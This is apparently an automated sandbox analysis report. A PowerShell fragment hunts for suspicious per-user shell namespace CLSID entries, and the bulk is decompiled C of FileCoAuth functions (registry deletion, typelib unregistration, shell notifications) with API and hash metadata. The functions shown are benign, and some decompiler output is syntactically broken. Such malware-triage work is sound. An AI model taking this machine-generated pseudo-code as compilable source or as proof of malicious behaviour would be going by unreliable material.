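        Reasons      = ($reasons -join ', ')
    }
}

function Get-SuspiciousNamespaceEntry {
    Get-ChildItem -LiteralPath $NameSpaceKey -ErrorAction SilentlyContinue |
        ForEach-Object { Resolve-NamespaceClsid -Guid $_.PSChildName } |
        Where-Object { $_.Reasons }
}

Get-SuspiciousNamespaceEntry | Format-Table -AutoSize
```

    Run it in the user context whose profile the sample executed under, since everything it reads is per-user. The sample is a 32-bit image; on a 64-bit host a 32-bit process sees the CLSID tree through the WOW64 redirection (HKLM\SOFTWARE\Classes\Wow6432Node\CLSID), so compare both views if an entry resolves differently from what the listing suggests. An entry whose GUID is not in the allow-list is not evidence on its own; a per-user CLSID pointing at an unsigned or missing DLL is.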

    C-Code - Quality: 30%
    			E00E99D69(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
    				intOrPtr _t77;
    				signed int _t78;
    				signed int _t87;
    				intOrPtr _t89;
    				signed int _t94;
    				signed short _t96;
    				signed short _t102;
    				signed short _t103;
    				void* _t105;
    				signed int _t107;
    				signed short _t109;
    				signed int _t113;
    				intOrPtr _t115;
    				intOrPtr _t122;
    				signed int _t125;
    				signed int _t129;
    				signed int _t136;
    				char* _t143;
    				intOrPtr* _t146;
    				void* _t149;
    				signed int _t151;
    				signed int _t153;
    
    				_push(0x3c);
    				E00EA31CA(E00EA3D60, __ebx, __edi, __esi);
    				_t146 = __ecx;
    				 *((intOrPtr*)(_t149 - 0x2c)) = __ecx;
    				 *(_t149 - 0x28) = "\\";
    				 *(_t149 - 0x24) = 0;
    				_t113 = 0;
    				 *(_t149 - 0x20) = 1;
    				_t77 =  *((intOrPtr*)( *__ecx + 4));
    				 *(_t149 - 0x1c) = 0;
    				_t115 =  *((intOrPtr*)(_t77 + __ecx + 0x20));
    				_t78 =  *(_t77 + __ecx + 0x24);
    				_t151 = _t78;
    				if(_t151 < 0) {
    					L7:
    					asm("xorps xmm0, xmm0");
    					asm("movlpd [ebp-0x40], xmm0");
    					 *(_t149 - 0x18) =  *(_t149 - 0x3c);
    					 *(_t149 - 0x14) =  *(_t149 - 0x40);
    				} else {
    					if(_t151 > 0) {
    						L6:
    						 *(_t149 - 0x14) = _t115 - 1;
    						asm("sbb eax, esi");
    						 *(_t149 - 0x18) = _t78;
    					} else {
    						if(_t115 <= 0) {
    							goto L7;
    						} else {
    							_t153 = _t78;
    							if(_t153 < 0) {
    								goto L7;
    							} else {
    								if(_t153 > 0) {
    									goto L6;
    								} else {
    									_t154 = _t115 - 1;
    									if(_t115 <= 1) {
    										goto L7;
    									} else {
    										goto L6;
    									}
    								}
    							}
    						}
    					}
    				}
    				_push(_t146);
    				E00E97E66(_t113, _t149 - 0x48, _t146, 0, _t154);
    				 *((intOrPtr*)(_t149 - 4)) = 0;
    				if( *((char*)(_t149 - 0x44)) != 0) {
    					 *((char*)(_t149 - 4)) = 1;
    					__imp__?getloc@ios_base@std@@QBE?AVlocale@2@XZ(_t149 - 0x30);
    					 *((char*)(_t149 - 4)) = 2;
    					 *((intOrPtr*)(_t149 - 0x34)) = E00E9A0FC(_t113,  *_t146, _t146, 0, __eflags);
    					 *((char*)(_t149 - 4)) = 1;
    					E00E9A1BF(_t149 - 0x30);
    					_t122 =  *((intOrPtr*)( *_t146 + 4));
    					__eflags = ( *(_t122 + _t146 + 0x14) & 0x000001c0) - 0x40;
    					if(( *(_t122 + _t146 + 0x14) & 0x000001c0) != 0x40) {
    						_t107 =  *(_t149 - 0x14);
    						_t136 =  *(_t149 - 0x18);
    						while(1) {
    							__eflags = _t136;
    							if(__eflags < 0) {
    								goto L17;
    							}
    							if(__eflags > 0) {
    								L15:
    								_t109 =  *( *((intOrPtr*)( *_t146 + 4)) + _t146 + 0x40) & 0x0000ffff;
    								__imp__?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z(_t109);
    								__eflags = 0xffff - (_t109 & 0x0000ffff);
    								if(0xffff != (_t109 & 0x0000ffff)) {
    									_t136 =  *(_t149 - 0x18);
    									_t107 =  *(_t149 - 0x14) + 0xffffffff;
    									 *(_t149 - 0x14) = _t107;
    									asm("adc ecx, 0xffffffff");
    									 *(_t149 - 0x18) = _t136;
    									continue;
    								} else {
    									_t113 = _t113 | 0x00000004;
    									__eflags = _t113;
    									 *(_t149 - 0x1c) = _t113;
    								}
    							} else {
    								__eflags = _t107;
    								if(_t107 > 0) {
    									goto L15;
    								}
    							}
    							goto L17;
    						}
    					}
    					L17:
    					_t125 = 0;
    					_t87 = 1;
    					__eflags = 1;
    					_t143 = "\\";
    					while(1) {
    						__eflags = _t113;
    						if(_t113 != 0) {
    							break;
    						}
    						__eflags = _t125;
    						if(__eflags < 0) {
    							L24:
    							_t94 =  *(_t149 - 0x14);
    							_t129 =  *(_t149 - 0x18);
    							while(1) {
    								__eflags = _t129;
    								if(__eflags < 0) {
    									goto L30;
    								}
    								if(__eflags > 0) {
    									L28:
    									_t96 =  *( *((intOrPtr*)( *_t146 + 4)) + _t146 + 0x40) & 0x0000ffff;
    									__imp__?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z(_t96);
    									__eflags = 0xffff - (_t96 & 0x0000ffff);
    									if(0xffff != (_t96 & 0x0000ffff)) {
    										_t129 =  *(_t149 - 0x18);
    										_t94 =  *(_t149 - 0x14) + 0xffffffff;
    										 *(_t149 - 0x14) = _t94;
    										asm("adc ecx, 0xffffffff");
    										 *(_t149 - 0x18) = _t129;
    										continue;
    									} else {
    										_t113 = _t113 | 0x00000004;
    										__eflags = _t113;
    									}
    								} else {
    									__eflags = _t94;
    									if(_t94 > 0) {
    										goto L28;
    									}
    								}
    								goto L30;
    							}
    						} else {
    							if(__eflags > 0) {
    								L22:
    								 *(_t149 - 0x3c) =  *( *((intOrPtr*)( *_t146 + 4)) + _t146 + 0x38);
    								_t102 =  *_t143 & 0x000000ff;
    								__imp__?widen@?$ctype@_W@std@@QBE_WD@Z(_t102);
    								_t103 = _t102 & 0x0000ffff;
    								__imp__?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z(_t103);
    								__eflags = 0xffff - (_t103 & 0x0000ffff);
    								_t125 =  *(_t149 - 0x24);
    								_t105 = 4;
    								_t113 =  ==  ? _t105 : _t113;
    								_t87 =  *(_t149 - 0x20) + 0xffffffff;
    								 *(_t149 - 0x1c) = _t113;
    								 *(_t149 - 0x20) = _t87;
    								asm("adc ecx, 0xffffffff");
    								_t143 =  &(( *(_t149 - 0x28))[1]);
    								 *(_t149 - 0x24) = _t125;
    								 *(_t149 - 0x28) = _t143;
    								continue;
    							} else {
    								__eflags = _t87;
    								if(_t87 <= 0) {
    									goto L24;
    								} else {
    									goto L22;
    								}
    							}
    						}
    						break;
    					}
    					L30:
    					_t89 =  *((intOrPtr*)( *_t146 + 4));
    					 *((intOrPtr*)(_t89 + _t146 + 0x20)) = 0;
    					 *((intOrPtr*)(_t89 + _t146 + 0x24)) = 0;
    					 *((intOrPtr*)(_t149 - 4)) = 0;
    				} else {
    					_t113 = 4;
    				}
    				__imp__?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z(_t113, 0);
    				E00E97ED1( *_t146, _t149 - 0x48);
    				return E00EA313E(_t146);
    			}

    Instruction addresses (the IDA plugin's per-line address column, spilled out of the listing's layout): the function body spans 0x00e99d69 to 0x00e99f8a; entries of 0x00000000 marked source lines with no address of their own.

    APIs
    • __EH_prolog3_catch.LIBCMT ref: 00E99D70
    • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP120(?,?,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E99DFB
    • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP120(?,?,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E99E4E
    • ?widen@?$ctype@_W@std@@QBE_WD@Z.MSVCP120(00EA8DB8,?,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E99E96
    • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP120(?,?,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E99EA3
    • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP120(?,?,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E99F0E
    • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000000,00000000,?,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E99F75
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: U?$char_traits@_W@std@@@std@@$?sputc@?$basic_streambuf@_$?getloc@ios_base@std@@?setstate@?$basic_ios@_?widen@?$ctype@_H_prolog3_catchVlocale@2@W@std@@
    • String ID:
    • API String ID: 2211854858-0
    • Opcode ID: f265e10021a8efa6e728e0ccc7b42b62e847d021558de7cd5e63054e1bccc7fb
    • Instruction ID: 7c6db2293b5b55dada209a5ebe942b663d62036c983fed65445c147404625c1c
    • Opcode Fuzzy Hash: f265e10021a8efa6e728e0ccc7b42b62e847d021558de7cd5e63054e1bccc7fb
    • Instruction Fuzzy Hash: 74613674A0121A8FCF28DFA8C4909BCBBF1BF59314B24511EE526F7792C730A941CBA0
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 60%
    			E00E982B9(void* __ecx, char _a4, void _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, wchar_t* _a24, void _a28, void* _a32, short _a144, void _a146, char _a148, short _a4242, char _a4244, signed int _a4260, signed int _a4268) {
    				char _v0;
    				char _v4;
    				char _v20;
    				intOrPtr _v28;
    				char _v44;
    				char _v48;
    				intOrPtr _v52;
    				char _v64;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				signed int _t38;
    				signed int _t40;
    				int _t55;
    				intOrPtr _t69;
    				void* _t70;
    				int _t76;
    				void _t86;
    				void* _t87;
    				intOrPtr _t89;
    				void* _t90;
    				signed int _t91;
    				signed int _t92;
    				void* _t97;
    
    				_t92 = _t91 & 0xfffffff8;
    				_push(0xffffffff);
    				_push(E00EA3B19);
    				_push( *[fs:0x0]);
    				_push(__ecx);
    				E00EA3610(0x10bc);
    				_t38 =  *0xeb0090; // 0xbb40e64e
    				_a4260 = _t38 ^ _t92;
    				_t40 =  *0xeb0090; // 0xbb40e64e
    				_push(_t40 ^ _t92);
    				 *[fs:0x0] =  &_a4268;
    				_t95 = _a4;
    				_t86 = _a8;
    				_t69 = _a16;
    				_t89 = _a20;
    				if(_a4 == 0) {
    					_v20 = GetLastError();
    					memset( &_a8, 0, 0x98);
    					_t76 =  &_a8;
    					_push(1);
    					_push(2);
    					E00E97773(_t69, _t76, _t86, _t89, _t95);
    					_a4268 = _a4268 & 0x00000000;
    					_push(_t89);
    					_push( &_v0);
    					E00E97EF0(_t69, _t86, _t89, _t95);
    					_a144 = 0;
    					memset( &_a146, 0, 0xffe);
    					_t55 = _vsnwprintf( &_a144, 0x7ff, _a24,  &_a28);
    					_t92 = _t92 + 0x28;
    					if(_t55 < 0) {
    						L4:
    						_a4242 = 0;
    					} else {
    						_t76 = 0x7ff;
    						_t97 = _t55 - 0x7ff;
    						if(_t97 > 0 || _t97 == 0) {
    							goto L4;
    						}
    					}
    					E00E97EF0(_t69, _t86, _t89, 0);
    					E00E9817A( &_v20,  &_v44);
    					_a4244 = 1;
    					E00E9823D(_t69,  &_v48, _v52);
    					_t65 =  >=  ? _v48 :  &_v48;
    					_t83 = _t89;
    					E00E990D4(_t69,  &_v48, _t89, _t86, _t89, _v28 - 8);
    					E00E94307( &_v64, 1, 0);
    					E00E97DF8();
    					__imp__??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ( >=  ? _v48 :  &_v48, _t86, _a12, _t69, E00E97EF0(_t69, _t86, _t89, 0),  &_v4, L" : ", _t76,  &_a148);
    				}
    				 *[fs:0x0] = _a4268;
    				_pop(_t87);
    				_pop(_t90);
    				_pop(_t70);
    				return E00EA29F2(_t70, _a4260 ^ _t92, _t83, _t87, _t90);
    			}

    Instruction addresses (the IDA plugin's per-line address column, spilled out of the listing's layout): the function body spans 0x00e982be to 0x00e98447; entries of 0x00000000 marked source lines with no address of their own.

    APIs
    • GetLastError.KERNEL32(BB40E64E,?,?,?,?,?,00EA3B19,000000FF,?,00E967F9,?,d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\win32api.cpp,000001D1,Win32Api::TaskDialogIndirect,pTaskConfig != NULL,pTaskConfig was NULL), ref: 00E98313
    • memset.MSVCR120 ref: 00E98329
      • Part of subcall function 00E97773: __EH_prolog3.LIBCMT ref: 00E9777A
      • Part of subcall function 00E97773: ??0?$basic_ios@_WU?$char_traits@_W@std@@@std@@IAE@XZ.MSVCP120(00000008,00E9833E,00000002,00000001), ref: 00E97797
      • Part of subcall function 00E97773: ??0?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAE@PAV?$basic_streambuf@_WU?$char_traits@_W@std@@@1@_N@Z.MSVCP120(?,00000000,00000000,00000008,00E9833E,00000002,00000001), ref: 00E977AF
      • Part of subcall function 00E97EF0: __EH_prolog3_catch.LIBCMT ref: 00E97EF7
      • Part of subcall function 00E97EF0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00E98084
    • memset.MSVCR120 ref: 00E98369
    • _vsnwprintf.MSVCR120 ref: 00E98385
    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120(00000001,00000000,?,00000000,?,?), ref: 00E9841E
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: U?$char_traits@_$W@std@@@std@@$memset$??0?$basic_ios@_??0?$basic_ostream@_??1?$basic_ios@_?setstate@?$basic_ios@_ErrorH_prolog3H_prolog3_catchLastV?$basic_streambuf@_W@std@@@1@__vsnwprintf
    • String ID: :
    • API String ID: 2443301839-3653984579
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 72%
    			E00E928A9(void* __ebx, struct HINSTANCE__* __ecx, signed int __edx, void* __eflags) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				char _v20;
    				void* __esi;
    				signed int _t23;
    				void* _t27;
    				signed int _t28;
    				intOrPtr* _t32;
    				void* _t33;
    				void* _t36;
    				intOrPtr* _t37;
    				struct HINSTANCE__* _t39;
    				void* _t41;
    				intOrPtr _t47;
    				void* _t50;
    				signed int _t52;
    
    				_t49 = __edx;
    				_t41 = __ebx;
    				_t23 =  *0xeb0090; // 0xbd336131
    				_v8 = _t23 ^ _t52;
    				_v16 = _v16 & 0x00000000;
    				_v12 = _v12 & 0x00000000;
    				_t27 = E00E923DD(__ecx, __edx, _t50,  &_v16,  &_v12);
    				_t51 = _t27;
    				if(_t27 >= 0) {
    					_t32 = _v12;
    					_t49 =  &_v20;
    					_t33 =  *((intOrPtr*)( *_t32 + 0x1c))(_t32,  &_v20);
    					_t51 = _t33;
    					if(_t33 >= 0) {
    						if( *0xeb2330 != 1) {
    							L5:
    							_t49 = __imp__#186;
    						} else {
    							_t39 = GetModuleHandleW(L"OLEAUT32.DLL");
    							if(_t39 == 0) {
    								goto L5;
    							} else {
    								_t49 = GetProcAddress(_t39, "UnRegisterTypeLibForUser");
    								if(_t49 == 0) {
    									goto L5;
    								}
    							}
    						}
    						_t47 = _v20;
    						_t36 =  *_t49(_t47,  *(_t47 + 0x18) & 0x0000ffff,  *(_t47 + 0x1a) & 0x0000ffff,  *((intOrPtr*)(_t47 + 0x10)),  *((intOrPtr*)(_t47 + 0x14)));
    						_t51 = _t36;
    						_t37 = _v12;
    						 *((intOrPtr*)( *_t37 + 0x30))(_t37, _v20);
    					}
    				}
    				_t28 = _v12;
    				if(_t28 != 0) {
    					 *((intOrPtr*)( *_t28 + 8))(_t28);
    				}
    				__imp__#6();
    				return E00EA29F2(_t41, _v8 ^ _t52, _t49, _t50, _t51, _v16);
    			}

    APIs
      • Part of subcall function 00E923DD: GetModuleFileNameW.KERNEL32(00E90000,?,00000104,Dv), ref: 00E92424
    • GetModuleHandleW.KERNEL32(OLEAUT32.DLL), ref: 00E928F8
    • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00E92908
    • SysFreeString.OLEAUT32(00000000), ref: 00E9294E
    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Module$AddressFileFreeHandleNameProcString
    • String ID: Dv$OLEAUT32.DLL$UnRegisterTypeLibForUser
    • API String ID: 815855407-210564437
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 48%
    			E00E94721(void* __ebx, intOrPtr __ecx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
    				intOrPtr* _t30;
    				intOrPtr _t43;
    				intOrPtr _t47;
    				void* _t53;
    
    				_t52 = __esi;
    				_t50 = __edi;
    				_push(0x4c);
    				E00EA3194(E00EA37C0, __ebx, __edi, __esi);
    				 *((intOrPtr*)(_t53 - 0x58)) = __ecx;
    				 *((intOrPtr*)(_t53 - 0x50)) =  *((intOrPtr*)(_t53 + 0xc));
    				_t30 =  *((intOrPtr*)(_t53 + 0x10));
    				 *((intOrPtr*)(_t53 - 0x54)) = _t30;
    				if(_t30 != 0) {
    					_t43 = 0;
    					 *_t30 = 0;
    					asm("stosd");
    					_push(_t53 - 0x4c);
    					asm("stosd");
    					asm("stosd");
    					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0xc)))) + 0x10))();
    					 *((intOrPtr*)(_t53 - 4)) = 0;
    					_t52 =  *((intOrPtr*)(_t53 - 0x4c));
    					_t50 =  *((intOrPtr*)(_t53 - 0x48));
    					while(_t52 != _t50) {
    						_t43 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t53 - 0x58)))) + 8))(_t52,  *((intOrPtr*)(_t53 + 8)),  *((intOrPtr*)(_t53 - 0x50)),  *((intOrPtr*)(_t53 - 0x54)));
    						if(_t43 >= 0) {
    							_t47 = 3;
    							 *((intOrPtr*)(_t53 - 0x38)) =  *((intOrPtr*)(_t53 + 8));
    							 *(_t53 - 0x3c) = "propertyType";
    							 *((intOrPtr*)(_t53 - 0x40)) = _t47;
    							 *((intOrPtr*)(_t53 - 0x24)) = "hr";
    							 *((intOrPtr*)(_t53 - 0x28)) = _t47;
    							 *((intOrPtr*)(_t53 - 0x20)) = _t43;
    							__imp__?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z("d:\\dbs\\sh\\odib\\0313_155253\\cmd\\24\\client\\onedrive\\product\\filecoauth\\filecoauth\\storageproviderfinder.cpp", 0x34, "StorageProviderFinder::RetrievePropertyHandlerByCheckingAllAccounts", 0xea7810, 0x882e191b, 1, 2, _t53 - 0x40);
    							__imp__?LoggingRotateIfNeeded@@YGXXZ();
    						} else {
    							_t52 = _t52 + 0x11c;
    							continue;
    						}
    						L8:
    						E00E949AF(_t53 - 0x4c);
    						goto L9;
    					}
    					goto L8;
    				} else {
    				}
    				L9:
    				return E00EA3152(_t43, _t50, _t52);
    			}

    Strings
    • d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\storageproviderfinder.cpp, xrefs: 00E947B3
    • StorageProviderFinder::RetrievePropertyHandlerByCheckingAllAccounts, xrefs: 00E947AC
    • x, xrefs: 00E947B8
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: H_prolog3_
    • String ID: x$StorageProviderFinder::RetrievePropertyHandlerByCheckingAllAccounts$d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\storageproviderfinder.cpp
    • API String ID: 2427045233-3770737364
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 75%
    			E00E922DF(void** __ecx, char _a4) {
    				_Unknown_base(*)()* _t6;
    				struct HINSTANCE__* _t9;
    
    				_t13 = __ecx;
    				_t12 =  *((intOrPtr*)(__ecx + 8));
    				if( *((intOrPtr*)(__ecx + 8)) == 0) {
    					if( *0xeb2338 != 0) {
    						_t6 =  *0xeb1748; // 0x0
    					} else {
    						_t9 = GetModuleHandleW(L"Advapi32.dll");
    						if(_t9 == 0) {
    							_t6 =  *0xeb1748; // 0x0
    						} else {
    							_t6 = GetProcAddress(_t9, "RegDeleteKeyExW");
    							 *0xeb1748 = _t6;
    						}
    						 *0xeb2338 = 1;
    					}
    					if(_t6 == 0) {
    						_t5 =  &_a4; // 0xe92862
    						return RegDeleteKeyW( *_t13,  *_t5);
    					} else {
    						_t4 =  &_a4; // 0xe92862
    						return  *_t6( *_t13,  *_t4, _t13[1], 0);
    					}
    				}
    				_t2 =  &_a4; // 0xe92862
    				return E00E91F75(_t12,  *((intOrPtr*)(__ecx)),  *_t2);
    			}

    APIs
    • GetModuleHandleW.KERNEL32(Advapi32.dll,?,?,00E92862,?), ref: 00E92308
    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00E92318
      • Part of subcall function 00E91F75: GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 00E91F89
      • Part of subcall function 00E91F75: GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 00E91F99
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: AddressHandleModuleProc
    • String ID: Advapi32.dll$RegDeleteKeyExW$b(
    • API String ID: 1646373207-2031347862
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 91%
    			E00E92237(signed short* __ecx, WCHAR* __edx) {
    				WCHAR* _v8;
    				signed int _t9;
    				void* _t10;
    				WCHAR* _t19;
    				void* _t22;
    				void* _t24;
    				signed int _t29;
    				WCHAR* _t31;
    
    				_push(__ecx);
    				_t19 = __edx;
    				_v8 = __ecx;
    				_t29 = CharUpperW( *__ecx & 0x0000ffff) & 0x0000ffff;
    				_t9 = CharUpperW( *_t19 & 0x0000ffff) & 0x0000ffff;
    				_t24 = 0x20;
    				_t22 = 9;
    				if(_t29 == 0) {
    					L8:
    					if(_t9 == 0 || _t9 == _t24 || _t9 == _t22) {
    						_t10 = 0;
    					} else {
    						goto L11;
    					}
    				} else {
    					while(_t29 == _t9 && _t29 != _t24 && _t29 != _t22) {
    						_t31 = CharNextW(_v8);
    						_v8 = _t31;
    						_t19 = CharNextW(_t19);
    						_t29 = CharUpperW( *_t31 & 0x0000ffff) & 0x0000ffff;
    						_t9 = CharUpperW( *_t19 & 0x0000ffff) & 0x0000ffff;
    						_t22 = 9;
    						_t24 = 0x20;
    						if(_t29 != 0) {
    							continue;
    						}
    						break;
    					}
    					if(_t29 == 0 || _t29 == _t24 || _t29 == _t22) {
    						goto L8;
    					} else {
    						L11:
    						asm("sbb eax, eax");
    						_t10 = (_t9 & 0xfffffffe) + 1;
    					}
    				}
    				return _t10;
    			}

    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Char$Upper$Next
    • API String ID: 3006421506-0
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 34%
    			E00E9F489(long _a4, int _a8, void* _a12, intOrPtr _a16) {
    				void* _v8;
    				void _v600;
    				void* __ebx;
    				void* __ebp;
    				void* _t20;
    				void* _t25;
    				void* _t33;
    				void* _t34;
    
    				_t38 = _a12;
    				if(_a12 == 0) {
    					return _t20;
    				}
    				memset( &_v600, 0, 0x250);
    				_push( &_v8);
    				_push(_a12);
    				_push( &_v600);
    				_t25 = E00E9EE33(0x250, _t33, _t34, _t38);
    				if(_t25 >= 0) {
    					_t40 = _a16;
    					if(_a16 == 0) {
    						SHChangeNotify(_a4, _a8, _v8, 0);
    					} else {
    						memset( &_v600, 0, 0x250);
    						_push( &_a12);
    						_push(_a16);
    						_push( &_v600);
    						_t25 = E00E9EE33(0x250, _t33, _t34, _t40);
    						if(_t25 >= 0) {
    							SHChangeNotify(_a4, _a8, _v8, _a12);
    							__imp__CoTaskMemFree(_a12);
    						}
    					}
    					__imp__CoTaskMemFree(_v8);
    				}
    				return _t25;
    			}

    APIs
    • memset.MSVCR120 ref: 00E9F4AE
      • Part of subcall function 00E9EE33: __EH_prolog3.LIBCMT ref: 00E9EE3A
      • Part of subcall function 00E9EE33: SHParseDisplayName.SHELL32(?,00000000,00000000,00000000,00000000), ref: 00E9EE6E
    • memset.MSVCR120 ref: 00E9F4DD
    • SHChangeNotify.SHELL32(?,?,?,00000000), ref: 00E9F508
    • CoTaskMemFree.OLE32(00000000), ref: 00E9F511
    • SHChangeNotify.SHELL32(?,?,?,00000000), ref: 00E9F524
    • CoTaskMemFree.OLE32(?), ref: 00E9F52D
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: ChangeFreeNotifyTaskmemset$DisplayH_prolog3NameParse
    • API String ID: 44509295-0
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 82%
    			E00EA2346(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				signed int _t125;
    				void* _t138;
    				signed int _t172;
    				signed int _t173;
    				signed int _t177;
    				intOrPtr* _t200;
    				void* _t204;
    				intOrPtr* _t206;
    				intOrPtr _t209;
    				intOrPtr _t211;
    				void* _t212;
    				void* _t213;
    
    				_t213 = __eflags;
    				_t204 = __edx;
    				_push(0x88);
    				E00EA3194(E00EA56D3, __ebx, __edi, __esi);
    				_t206 =  *((intOrPtr*)(_t212 + 8));
    				 *((intOrPtr*)(_t212 - 0x90)) =  *((intOrPtr*)(_t212 + 0xc));
    				 *((intOrPtr*)(_t212 - 0x94)) =  *((intOrPtr*)(_t212 + 0x18));
    				E00E94E9D(_t212 - 0x88, L"Software\\Classes\\CLSID\\");
    				 *(_t212 - 4) =  *(_t212 - 4) & 0x00000000;
    				E00E95904(_t212 - 0x88,  *((intOrPtr*)(_t212 + 0xc)), 0, 0xffffffff);
